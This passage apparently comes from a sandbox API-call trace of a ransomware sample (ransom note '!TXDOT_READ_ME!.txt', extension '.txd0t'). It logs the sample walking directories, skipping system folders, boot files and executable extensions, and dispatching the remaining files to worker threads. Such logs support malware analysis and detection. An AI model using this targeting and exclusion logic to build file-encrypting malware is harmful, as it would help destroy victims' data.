dwMilliseconds=0xffffffff) returned 0x2 [0086.434] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.434] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0086.434] SetEvent (hEvent=0x410) returned 1 [0086.434] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.434] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.434] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.434] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0086.434] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0086.434] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" [0086.435] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.435] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.435] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.435] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.435] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.435] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.437] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0086.441] GetProcessHeap () returned 0xe30000 [0086.441] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.441] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0086.441] StrCmpW (psz1="2052", psz2=".") returned 1 [0086.441] StrCmpW (psz1="2052", psz2="..") returned 1 [0086.441] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.441] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.441] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2052", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0086.441] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system32\\") returned 0x0 [0086.441] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.441] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system\\") returned 0x0 [0086.441] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\local\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\boot\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\perflogs\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\programdata\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\drivers\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\wsus\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="crypt_detect") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="cryptolocker") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="ransomware") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\WINDOWS") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.442] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files") returned 0x0 [0086.442] GetProcessHeap () returned 0xe30000 [0086.442] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.442] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0086.442] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\*") returned="C:\\588bce7c90097ed212\\2052\\*" [0086.442] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0086.442] StrCmpW (psz1=".", psz2=".") returned 0 [0086.442] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.442] StrCmpW (psz1="..", psz2=".") returned 1 [0086.442] StrCmpW (psz1="..", psz2="..") returned 0 [0086.442] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.442] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.443] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.443] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0086.443] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0086.443] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="C:\\588bce7c90097ed212\\2052\\eula.rtf" [0086.443] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.443] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.443] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.443] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.443] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.443] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0086.443] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.443] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\2052\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" [0086.443] SetEvent (hEvent=0x418) returned 1 [0086.443] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.443] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.443] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.443] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0086.443] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0086.444] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0086.444] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.444] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.444] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.444] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.444] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.444] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0086.481] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.481] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0086.481] SetEvent (hEvent=0x3fc) returned 1 [0086.481] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.481] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.481] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.481] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0086.482] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0086.482] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" [0086.482] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.482] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.482] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.482] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.482] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.482] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.482] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0086.482] GetProcessHeap () returned 0xe30000 [0086.482] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.482] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2070", cAlternateFileName="")) returned 1 [0086.482] StrCmpW (psz1="2070", psz2=".") returned 1 [0086.482] StrCmpW (psz1="2070", psz2="..") returned 1 [0086.483] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.483] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.483] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2070", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system32\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\local\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\boot\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\perflogs\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\programdata\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\drivers\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\wsus\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="crypt_detect") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="cryptolocker") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="ransomware") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\WINDOWS") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.483] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files") returned 0x0 [0086.483] GetProcessHeap () returned 0xe30000 [0086.483] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.483] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0086.483] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\*") returned="C:\\588bce7c90097ed212\\2070\\*" [0086.483] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0086.484] StrCmpW (psz1=".", psz2=".") returned 0 [0086.484] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.484] StrCmpW (psz1="..", psz2=".") returned 1 [0086.484] StrCmpW (psz1="..", psz2="..") returned 0 [0086.484] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, 